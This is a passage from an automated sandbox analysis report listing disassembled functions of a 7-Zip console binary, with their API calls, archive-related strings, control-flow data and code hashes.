                            • Opcode Fuzzy Hash: b12c154c2e3866b65399520ae56aa64e94b7b1ea79474865b839280aa29d765d
                            • Instruction Fuzzy Hash: FE215EB5900708EFCB01AFA4DC4AAA97BB8FB0D764F00822AF515A22A2C77C5441CB65
                            Function 0076FFB1 Relevance: 10.5, APIs: 7, Instructions: 43COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: _initterm$FilterXcpt__getmainargs__p___initenv__setusermatherr_controlfpexit
                            • String ID:
                            • API String ID: 279829931-0
                            • Opcode ID: 68a443ca9ee8fdfc172fda8305512f203157d579d589b593f16f9100d0c6747c
                            • Instruction ID: 19c9ce2ba3245d3c7330d995c4faef99261e5fce0e509f885cdaf450a7904271
                            • Opcode Fuzzy Hash: 68a443ca9ee8fdfc172fda8305512f203157d579d589b593f16f9100d0c6747c
                            • Instruction Fuzzy Hash: BA010CB5940308EFDF05ABE4DC4ACEE7779FB0C354B10815AF509B2262DA7D9451CB64
                            Function 006F1858 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 213COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • __EH_prolog.LIBCMT ref: 006F185D
                              • Part of subcall function 006F021A: __EH_prolog.LIBCMT ref: 006F021F
                              • Part of subcall function 006F062E: __EH_prolog.LIBCMT ref: 006F0633
                            • _CxxThrowException.MSVCRT(?,00786010), ref: 006F1961
                              • Part of subcall function 006F1AA5: __EH_prolog.LIBCMT ref: 006F1AAA
                            Strings
                            • Duplicate archive path:, xrefs: 006F1A8D
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ExceptionThrow
                            • String ID: Duplicate archive path:
                            • API String ID: 2366012087-4000988232
                            • Opcode ID: f2ddcd4c9a587acf1021036b809659586102da18c3f4b473f2bb3bca79cc5cc3
                            • Instruction ID: 9dfe6c05fc003450061bd707295314765643bc4651d6786c3eee734635b453c9
                            • Opcode Fuzzy Hash: f2ddcd4c9a587acf1021036b809659586102da18c3f4b473f2bb3bca79cc5cc3
                            • Instruction Fuzzy Hash: ED81AF31D00248EFCF15EFA4D495AEDB7B2AF0A350F1040AEE51677292DB74AE05CB64
                            Function 006D6C72 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 398COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1563 6d6c72-6d6c8e call 76fb10 1566 6d6c96-6d6c9e 1563->1566 1567 6d6c90-6d6c94 1563->1567 1569 6d6ca6-6d6cae 1566->1569 1570 6d6ca0-6d6ca4 1566->1570 1567->1566 1568 6d6cd3-6d6cdc call 6d8664 1567->1568 1576 6d6d87-6d6d92 call 6d88c6 1568->1576 1577 6d6ce2-6d6d02 call 6d67f0 call 6d2f88 call 6d87df 1568->1577 1569->1568 1571 6d6cb0-6d6cb5 1569->1571 1570->1568 1570->1569 1571->1568 1573 6d6cb7-6d6cce call 6d67f0 call 6d2f88 1571->1573 1589 6d715d-6d715f 1573->1589 1584 6d6f4c-6d6f62 call 6d87fa 1576->1584 1585 6d6d98-6d6d9e 1576->1585 1600 6d6d4a-6d6d61 call 6d7b41 1577->1600 1601 6d6d04-6d6d09 1577->1601 1597 6d6f64-6d6f66 1584->1597 1598 6d6f67-6d6f74 call 6d85e2 1584->1598 1585->1584 1588 6d6da4-6d6dc7 call 6d2e47 * 2 1585->1588 1610 6d6dc9-6d6dcf 1588->1610 1611 6d6dd4-6d6dda 1588->1611 1592 6d7118-6d7126 1589->1592 1597->1598 1612 6d6f76-6d6f7c 1598->1612 1613 6d6fd1-6d6fd8 1598->1613 1615 6d6d67-6d6d6b 1600->1615 1616 6d6d63-6d6d65 1600->1616 1601->1600 1604 6d6d0b-6d6d38 call 6d9252 1601->1604 1604->1600 1623 6d6d3a-6d6d45 1604->1623 1610->1611 1617 6d6ddc-6d6def call 6d2407 1611->1617 1618 6d6df1-6d6df9 call 6d3221 1611->1618 1612->1613 1621 6d6f7e-6d6f8a call 6d6bf5 1612->1621 1619 6d6fda-6d6fde 1613->1619 1620 6d6fe4-6d6feb 1613->1620 1625 6d6d6d-6d6d75 1615->1625 1626 6d6d78 1615->1626 1624 6d6d7a-6d6d82 call 6d764c 1616->1624 1617->1618 1638 6d6dfe-6d6e0b call 6d87df 1617->1638 1618->1638 1619->1620 1629 6d70e5-6d70ea call 6d6868 1619->1629 1630 6d701d-6d7024 call 6d8782 1620->1630 1631 6d6fed-6d6ff7 call 6d6bf5 1620->1631 1621->1629 1641 6d6f90-6d6f93 1621->1641 1623->1589 1651 6d7116 1624->1651 1625->1626 1626->1624 1643 6d70ef-6d70f3 1629->1643 1630->1629 1648 6d702a-6d7035 1630->1648 1631->1629 1646 6d6ffd-6d7000 1631->1646 1652 6d6e0d-6d6e10 1638->1652 1653 6d6e43-6d6e50 call 6d6c72 1638->1653 1641->1629 1647 6d6f99-6d6fb6 call 6d67f0 call 6d2f88 1641->1647 1649 6d710c 1643->1649 1650 6d70f5-6d70f7 1643->1650 1646->1629 1654 6d7006-6d701b call 6d67f0 1646->1654 1683 6d6fb8-6d6fbd 1647->1683 1684 6d6fc2-6d6fc5 call 6d717b 1647->1684 1648->1629 1656 6d703b-6d7044 call 6d8578 1648->1656 1658 6d710e-6d7111 call 6d6848 1649->1658 1650->1649 1657 6d70f9-6d7102 1650->1657 1651->1592 1660 6d6e1e-6d6e36 call 6d67f0 1652->1660 1661 6d6e12-6d6e15 1652->1661 1678 6d6f3a-6d6f4b call 6d1e40 * 2 1653->1678 1679 6d6e56 1653->1679 1674 6d6fca-6d6fcc 1654->1674 1656->1629 1677 6d704a-6d7054 call 6d717b 1656->1677 1657->1649 1666 6d7104-6d7107 call 6d717b 1657->1666 1658->1651 1681 6d6e58-6d6e7e call 6d2f1c call 6d2e04 1660->1681 1682 6d6e38-6d6e41 call 6d2fec 1660->1682 1661->1653 1667 6d6e17-6d6e1c 1661->1667 1666->1649 1667->1653 1667->1660 1674->1658 1691 6d7064-6d7097 call 6d2e47 call 6d1089 * 2 call 6d6868 1677->1691 1692 6d7056-6d705f call 6d2f88 1677->1692 1678->1584 1679->1681 1701 6d6e83-6d6e99 call 6d6bb5 1681->1701 1682->1681 1683->1684 1684->1674 1725 6d70bf-6d70cc call 6d6bf5 1691->1725 1726 6d7099-6d70af wcscmp 1691->1726 1703 6d7155-6d7158 call 6d6848 1692->1703 1709 6d6ecf-6d6ed1 1701->1709 1710 6d6e9b-6d6e9f 1701->1710 1703->1589 1712 6d6f09-6d6f35 call 6d1e40 * 2 call 6d6848 call 6d1e40 * 2 1709->1712 1713 6d6ec7-6d6ec9 SetLastError 1710->1713 1714 6d6ea1-6d6eae call 6d22bf 1710->1714 1712->1651 1713->1709 1723 6d6eb0-6d6ec5 call 6d1e40 call 6d2e04 1714->1723 1724 6d6ed3-6d6ed9 1714->1724 1723->1701 1728 6d6eec-6d6f07 call 6d31e5 1724->1728 1729 6d6edb-6d6ee0 1724->1729 1740 6d70ce-6d70d1 1725->1740 1741 6d7129-6d7133 call 6d67f0 1725->1741 1732 6d70bb 1726->1732 1733 6d70b1-6d70b6 1726->1733 1728->1712 1729->1728 1735 6d6ee2-6d6ee8 1729->1735 1732->1725 1739 6d7147-6d7154 call 6d2f88 call 6d1e40 1733->1739 1735->1728 1739->1703 1746 6d70d8-6d70e4 call 6d1e40 1740->1746 1747 6d70d3-6d70d6 1740->1747 1758 6d713a 1741->1758 1759 6d7135-6d7138 1741->1759 1746->1629 1747->1741 1747->1746 1762 6d7141-6d7144 1758->1762 1759->1762 1762->1739
                            APIs
                            • __EH_prolog.LIBCMT ref: 006D6C77
                            • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 006D6EC9
                              • Part of subcall function 006D6C72: wcscmp.MSVCRT ref: 006D70A5
                              • Part of subcall function 006D6BF5: __EH_prolog.LIBCMT ref: 006D6BFA
                              • Part of subcall function 006D6BF5: GetFileAttributesW.KERNEL32(?,?,?,00000000,?), ref: 006D6C1A
                              • Part of subcall function 006D6BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 006D6C49
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                            • String ID: :$DATA
                            • API String ID: 3316598575-2587938151
                            • Opcode ID: e2f86df79d449c33ffa1257922df758d4f7fcc976912dba75519443a94a21e45
                            • Instruction ID: 3c0d074fdb860dd0da2ae9f1897e9c86b5804e4a0dff5d65b49b0f59c33c6589
                            • Opcode Fuzzy Hash: e2f86df79d449c33ffa1257922df758d4f7fcc976912dba75519443a94a21e45
                            • Instruction Fuzzy Hash: C3E1E070D042099ACF21EFA4C895AEEB7B3AF15314F10451FF8466B3D2EB70A94ACB55
                            Function 006E6FC5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 006E6FCA
                              • Part of subcall function 006E6E71: __EH_prolog.LIBCMT ref: 006E6E76
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: Incorrect reparse stream$Unknown reparse stream$can't delete file
                            • API String ID: 3519838083-394804653
                            • Opcode ID: 23891623b49f96454e2b10eeb8aaaf46641057555defb7c86e3ea450b9074e1e
                            • Instruction ID: aa5710929b98c92195b2327d85dfc93b7b7f71eadc5e0a5ea5baed661d47277b
                            • Opcode Fuzzy Hash: 23891623b49f96454e2b10eeb8aaaf46641057555defb7c86e3ea450b9074e1e
                            • Instruction Fuzzy Hash: 4A4193B290A3C49BCF21DFA6C4509EEBBF6AF59340F58446EE086A3341C6706E45C765
                            Function 007084A7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$H_prolog
                            • String ID: =
                            • API String ID: 2614055831-2525689732
                            • Opcode ID: ce9be7827c87ba3bd9a6d68d58679a777e4fcc33e6302261df0f6bf0fe6416b3
                            • Instruction ID: 4f248bb9e313fe5fabf3bd65afe1532edaca8315116169eee5dcb6fa454e8b38
                            • Opcode Fuzzy Hash: ce9be7827c87ba3bd9a6d68d58679a777e4fcc33e6302261df0f6bf0fe6416b3
                            • Instruction Fuzzy Hash: F3218E32904108EBCF4AEB94DD56AEDBBB6EF48310F20412FE401722A1DFB56E54CB95
                            Function 0071BDB5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 0071BDBA
                              • Part of subcall function 0071BE69: __EH_prolog.LIBCMT ref: 0071BE6E
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: w$0w$Dw
                            • API String ID: 3519838083-1785023824
                            • Opcode ID: 0c470e32a9b972eeadd9977ec16203266e796d6a1503ef1163406fdafaae313e
                            • Instruction ID: 627ad17d9369f74f3d7ede3d94b2678b02a97df6a662d3b434196fd6253f0245
                            • Opcode Fuzzy Hash: 0c470e32a9b972eeadd9977ec16203266e796d6a1503ef1163406fdafaae313e
                            • Instruction Fuzzy Hash: 931102B0941B44CFC721DF69C188686FBE4BF18348F90C8AED0AA87712C7B8A548CB50
                            Function 00708341 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00708346
                            • fputs.MSVCRT ref: 0070835B
                            • fputs.MSVCRT ref: 00708364
                              • Part of subcall function 007083BF: __EH_prolog.LIBCMT ref: 007083C4
                              • Part of subcall function 007083BF: fputs.MSVCRT ref: 00708401
                              • Part of subcall function 007083BF: fputs.MSVCRT ref: 00708437
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$H_prolog
                            • String ID: =
                            • API String ID: 2614055831-2525689732
                            • Opcode ID: 92fff8f843fde0165e1671e0ff54c2f2d86d8b759e6cb8bd8240ba8fd1f2aca9
                            • Instruction ID: cd5624c42f95605de865d6aafa21de3cbdbc4e06d22ca42642e7179a6da59ef5
                            • Opcode Fuzzy Hash: 92fff8f843fde0165e1671e0ff54c2f2d86d8b759e6cb8bd8240ba8fd1f2aca9
                            • Instruction Fuzzy Hash: B701D671E00008EBCF56BBA4D812AEDBBB6EF84750F00802EF445562A1CFB84A55DBD5
                            Function 00767DA0 Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,00000000,006EAB57), ref: 00767DAA
                            • GetLastError.KERNEL32(?,00000000,006EAB57), ref: 00767DBB
                            • CloseHandle.KERNELBASE(00000000,?,00000000,006EAB57), ref: 00767DCF
                            • GetLastError.KERNEL32(?,00000000,006EAB57), ref: 00767DD9
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorLast$CloseHandleObjectSingleWait
                            • String ID:
                            • API String ID: 1796208289-0
                            • Opcode ID: a5ada12c0cb7968a5a3407522dc5938a185b31dfc0ec1b6655d82e0f6c5e0d72
                            • Instruction ID: 9b8395d59686b86d50dd6cad2fd17676401a0be2d0d0b484b69e18db56afaa75
                            • Opcode Fuzzy Hash: a5ada12c0cb7968a5a3407522dc5938a185b31dfc0ec1b6655d82e0f6c5e0d72
                            • Instruction Fuzzy Hash: 02F0FE7130820247EB296ABD9C84B36669CAF553FCB244B29ED66D21D4EB6CCC40CA60
                            Function 00705883 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                            • EnterCriticalSection.KERNEL32(00792938), ref: 0070588B
                            • LeaveCriticalSection.KERNEL32(00792938), ref: 007058BC
                              • Part of subcall function 0070C911: GetTickCount.KERNEL32 ref: 0070C926
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: CriticalSection$CountEnterLeaveTick
                            • String ID: v$8)y
                            • API String ID: 1056156058-625179386
                            • Opcode ID: db25da4c5d408a4d601769827aa738e4e682b37a9f648719a56be7f7a55cbbe6
                            • Instruction ID: eec2e94a0c405a9cfdc2a3b2fd3e1f61cbb0165a307d51fdb1baa834366bf934
                            • Opcode Fuzzy Hash: db25da4c5d408a4d601769827aa738e4e682b37a9f648719a56be7f7a55cbbe6
                            • Instruction Fuzzy Hash: 3DE06D75505210DFC305DF14D808E8A37E5AF98311F05467DF409873A2C7389845CBB5
                            Function 006F2096 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 722COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 006F209B
                              • Part of subcall function 006D757D: GetLastError.KERNEL32(006DD14C), ref: 006D757D
                              • Part of subcall function 006F2C6C: __EH_prolog.LIBCMT ref: 006F2C71
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ErrorLastfree
                            • String ID: Cannot find archive file$The item is a directory
                            • API String ID: 683690243-1569138187
                            • Opcode ID: 6acc726eb4993fda71862172ebd59172f8e20bca1e3a2ac4794fcc81a1f57a8e
                            • Instruction ID: 84a9fe5d953acac47003e05211799139e14907898e0aa73e6654aefc21cc834a
                            • Opcode Fuzzy Hash: 6acc726eb4993fda71862172ebd59172f8e20bca1e3a2ac4794fcc81a1f57a8e
                            • Instruction Fuzzy Hash: CD723470D00259DFCB65DFA8C890BEDBBB2AF59300F14409AE959AB352CB709E81CF55
                            Function 0070C911 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: CountTickfputs
                            • String ID: .
                            • API String ID: 290905099-4150638102
                            • Opcode ID: 47f36793ac9876eadeb0b58c341cc9e22fe613f7161ddd3218c963404d5c5ffc
                            • Instruction ID: 8e3e2562bf332e9581312b0850688bd6296e50f3862a9e435fcdb3380dd36519
                            • Opcode Fuzzy Hash: 47f36793ac9876eadeb0b58c341cc9e22fe613f7161ddd3218c963404d5c5ffc
                            • Instruction Fuzzy Hash: 7B715970A00B05DFCB62EF64C491AAAB7F6AF91300F044A1EE08797681DB78B849CB15
                            Function 007108B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 006D9C8F: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 006D9CB3
                              • Part of subcall function 006D9C8F: GetProcAddress.KERNEL32(00000000), ref: 006D9CBA
                              • Part of subcall function 006D9C8F: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 006D9CC8
                            • __aulldiv.LIBCMT ref: 0071093F
                            • __aulldiv.LIBCMT ref: 0071094B
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                            • String ID: 3333
                            • API String ID: 3520896023-2924271548
                            • Opcode ID: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                            • Instruction ID: 099e897796d788eb3d1477a949d53f8ea5c5eb0829b211acfeab7bf7b9e0f4a6
                            • Opcode Fuzzy Hash: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                            • Instruction Fuzzy Hash: 53219AB1900704AFE730DF699885B5BBAF9EB84750F00892FF186D7641D674A9808BA5
                            Function 006FA7C5 Relevance: 5.1, APIs: 2, Strings: 1, Instructions: 606COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                            • memset.MSVCRT ref: 006FAEBA
                            • memset.MSVCRT ref: 006FAECD
                              • Part of subcall function 007104D2: _CxxThrowException.MSVCRT(?,00784A58), ref: 007104F8
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: memset$ExceptionThrowfree
                            • String ID: Split
                            • API String ID: 1404239998-1882502421
                            • Opcode ID: 48c269dca69d828c497b9caba6e912868a3371fded00fa5c092a3f6d0907bd5c
                            • Instruction ID: aa5095f1fb8b2e3f0111315fa29032ce543b4537a3d87de45215bfad40f4323c
                            • Opcode Fuzzy Hash: 48c269dca69d828c497b9caba6e912868a3371fded00fa5c092a3f6d0907bd5c
                            • Instruction Fuzzy Hash: 804239B0A0424DDFDB25DBA4C984BEDBBB6BF09304F1440A9E649A7351CB71AE85CB11
                            Function 006D759A Relevance: 4.6, APIs: 3, Instructions: 64fileCOMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 006D759F
                              • Part of subcall function 006D764C: CloseHandle.KERNELBASE(00000000,?,006D75AF,00000002,?,00000000,00000000), ref: 006D7657
                            • CreateFileW.KERNELBASE(00000000,00000000,?,00000000,00000002,00000000,00000000,?,00000000,00000002,?,00000000,00000000), ref: 006D75E5
                            • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,00000000,?,00000000,00000002), ref: 006D7626
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: CreateFile$CloseH_prologHandle
                            • String ID:
                            • API String ID: 449569272-0
                            • Opcode ID: fbecea208cd03f28a4ce832093c26105b5a59eec9a23e529f0965ac79055946e
                            • Instruction ID: ba8f409d483a34966787e62003dfd75fe13b3269c7199f6a83ba0c5857497c7a
                            • Opcode Fuzzy Hash: fbecea208cd03f28a4ce832093c26105b5a59eec9a23e529f0965ac79055946e
                            • Instruction Fuzzy Hash: 1411AF7280020AEFCF11AFA8DC408EEBB7BFF54354B14892EF860562A1DB358D61DB51
                            Function 007083BF Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                            Download Yara Rule
                            APIs
                            • fputs.MSVCRT ref: 00708437
                            • fputs.MSVCRT ref: 00708401
                              • Part of subcall function 006D1FB3: __EH_prolog.LIBCMT ref: 006D1FB8
                            • __EH_prolog.LIBCMT ref: 007083C4
                              • Part of subcall function 006D1FA0: fputc.MSVCRT ref: 006D1FA7
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
